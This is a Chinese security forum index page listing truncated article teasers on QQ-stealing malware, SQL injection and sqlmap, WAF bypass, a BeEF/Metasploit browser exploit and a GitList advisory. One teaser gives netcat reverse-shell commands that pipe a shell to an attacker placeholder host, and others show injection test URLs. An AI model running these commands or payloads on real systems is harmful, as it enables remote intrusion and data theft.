电脑病毒论坛 今日: 0|主題: 1421|排名: 14 

QQ粘虫主要通过两个渠道传播,如下： 　　QQ粘虫传播途径： 　　1、伪装成QQ工具、游戏， 　　2、伪装成各种QQ好友发送的文件、主要以办公文件为主。 　　QQ粘虫危害： 　　专门从事QQ盗号产业的不法分子会对偷来的QQ号分类处理，有Q币的有游戏装备的会有专门的团队完成虚拟财产的转移，再冒充他人身份登录QQ号行骗。因而网 ...

“肉鸡”在黑客里面的一个专有名词，意思是你的电脑已经完全被黑客所控制，他可以控制你电脑里面的一切资料，甚至是记录你输入的QQ密码，银行密码。同时，他还可以利用你的电脑去攻击其它人的电脑。很多朋友的电脑已经沦为肉鸡，自己还不知道。下面，小编就来给大家盘点几条电脑沦为肉鸡的表现，当网友遇到这些现 ...

本文详细讲述了 sql注入的原理及防范技巧，目的是让初学者利用SQL注入技术来解决他们面临的问题, 成功的使用它们,并在这种攻击中保护自己。希望能对大家有所帮助。 一、 介绍 　　当一台机器只打开了80端口, 你最依赖的漏洞扫描器也不能返回任何有用的内容, 并且你知道管理员经常为机器打补丁, 我们就不得不使用web攻击方式 ...

(挂马现象：非IIS映射修改,非ARP病毒,且源代码里没有iframe代码的)今天访问公司的一个网站，突然发现网页显示不对，右键查看HTML代码，发现iframe了一个网站的js文件，不用说，肯定被挂马了。 进入服务器，看了下文件源代码里并没有这个iframe代码，但整个服务器的所有网站访问后代码里都自动加了这个iframe代码。 我第一反 ...

Kindeditor漏洞 编辑代码内容被执行 kindeditor漏洞描述：在kindeditor编辑代码添加到数据库时没有任何问题，也就是一些HTML代码不会被执行，例如：<a href="#">web编程</a>，这样的代码在首次编辑的时候没有被执行。但是，从数据库里取出来再放到kindeditor里进行修改的时候问题就出现了，这行HTML代码被执行了，结果这样 ...

Jeff Dray最近经过对IT行业的深入调查研究，通过总结和分析针对IT行业列出了一份类别名单。在这里，他定义了七类最不安全的网络管理员。如果你是一名网络管理员，并且已经意识到工作中还存在着不足，看看你属于名单中的哪一类？ 大多数网络管理员对工作游刃 有余，并且可以在一个具有高度挑战和技术难度的任务中，使工作顺 ...

NC的原生做法： nc -l -vv -p 2222 -e /bin/bash无法使用NC反弹的时候可以这样 先在tmp创建一个普通管道mknod /tmp/backpipe p或者mkfifo /tmp/backpipe p然后管道一边接入shell,一变用NC反弹到攻击者主机x.x.x.x/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe PS：攻防的对抗一直在思路的转变之间，将 ...

ps：其实看到zone里很多问sqlmap的问题在通读看完那篇文章后都能解决。可惜啊，现在的人通读看文章的耐心都没有了，遇到了哪个问题就想起针对这个问题求助，却不知道仔细看完之后，以后可以省多少时间来求助，吐槽完毕，正文开始： 对Windows注册表操作当数据库为MySQL，PostgreSQL或Microsoft SQL Server，并且当前web应用 ...

sqlmap 一个自动SQL 射入工具(sqlmap.py)汉化直接可用版类型：扫瞄攻击大小：14MB语言：英文软件时间：2015-01-04查看详情 TIP1 当我们注射的时候，判断注入 http://site/script?id=10 http://site/script?id=11-1 # 相当于 id=10 http://site/script?id=(select 10) # 相当于 id=10 http://site/script?id=10 and 1=1 #失 ...

http://192.168.136.131/sqlmap/mysql/get_int.php?id=1当给sqlmap这么一个url的时候，它会： 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择，读取哪些数据sqlmap支持五种不同的注入模式： 1、基于布尔的盲注，即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注， ...

如何使用搜索引擎搜索资料，搜索引擎的使用方法 1、打开搜索引擎 1）打开网页浏览器，在地址栏输入百度搜索的网址 www.baidu.com 然后点右边的转到按钮，或者按一下回车键； 2）进入百度搜索页面后，在中间输入要搜索的资料名称，然后点右边的“百度一下”按钮， 中间输入的文字也称作“关键字”，尽量 ...

如果管理员遇到这样的情况的话就需要注意了你的服务器可能被入侵了。 一般黑客都将这种的添加账号的手段称为”不死账户” 首先我们来了解建立不死账户的方法， 1.黑客其将guest用户放到administratorss组中，当管理administrator登录后删除administratorss组中的guest账户，保存时提示“无法在内置账户上运 ...

1 背景概述 WEB应用漏洞导致的入侵时有发生，扫描器和WAF并不能解决所有的问题，于是尝试在主机侧针对PHP环境做了一个防御方案。很荣幸的邀请到TSRC部分白帽子做了一次对抗演习，本文主要分享一下防御思路。 防御方案主要想解决的问题是getshell、主机敏感文件泄漏等问题。于是乎出了下面这样一个题目：部署了防御方案的Ngi ...

一、前言     安全狗是一款大家熟悉的服务器安全加固产品，据称已经拥有50W的用户量。最近经过一些研究，发现安全狗的一些防护功能，例如SQL注入、文件上传、防webshell等都可以被绕过，下面为大家一一介绍。 二、测试环境    本次测试环境为 中文版Win2003 SP2+PHP 5.3.28+Mysql 5.1.72 网 ...

今天刚好为站点的后台弄了下https，就来分享我了解的吧。 密码学最早可以追溯到古希腊罗马时代，那时的加密方法很简单：替换字母。 早期的密码学： 古希腊人用一种叫 Scytale 的工具加密。更快的工具是 transposition cipher—：只是把羊皮纸卷在一根圆木上，写下信息，羊皮纸展开后，这些信息就加密完成了。 虽然很容 ...

系统:KALI 用到的工具：beEF+msf 利用的IE漏洞是：http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf MS12-063 AutomaticIE 7 on Windows XP SP3IE 8 on Windows XP SP3IE 7 on Windows VistaIE 8 on Windows VistaIE 8 on Windows 7IE 9 on Windows 7 用到的beef+msf 先配置下： root@kali:~# ...

它曾是世界性图书馆梦的开始，现在它是全球知识的聚集地，它是目前最流行的，人们将应用都部署之上的万维网。 它是敏捷的代表，它不是单一的实体，它由客户端和服务端组成，它的功能在不断地强大，它还有标准。 虽然越来越多的解决方案非常适用于发现什么可行，什么不可行，但它几乎没有一致性，没有易于应用的编程模型。俗 ...

Linux系统用netstat命令查看DDOS攻击具体命令用法如下： 复制代码代码如下:netstat -na 显示所有连接到服务器的活跃的网络连接 复制代码代码如下:netstat -an | grep :80 | sort 只显示连接到80段口的活跃的网络连接,80是http端口,这对于web服务器非常有用,并且对结果排序.对于你从许多的连接中找出单个发动洪水攻击IP非常 ...

受影响系统：GitList GitList < 0.4.0 GitList GitList描述：--------------------------------------------------------------------------------BUGTRAQ  ID: 68253 CVE(CAN) ID: CVE-2014-4511 GitList是用PHP编写的开源软件，是git库浏览器。 GitList 0.4.0之前版本在实现上存在远程代码执行 ...

如何手动卸载ESET安全产品？ KB的解决方案ID：SOLN2289 |最后修改：2010年4月15日在试图手动卸载ESET安全产品，第一次尝试使用安装ESET开始菜单卸载程序与ESET聪明的安全4.x或ESET NOD32防毒软件4.x的规定点击这里说明的说明。如果您运行安装ESET开始菜单卸载程序和你继续有问题，无法重新安装ESET安全产品，或者如果 ...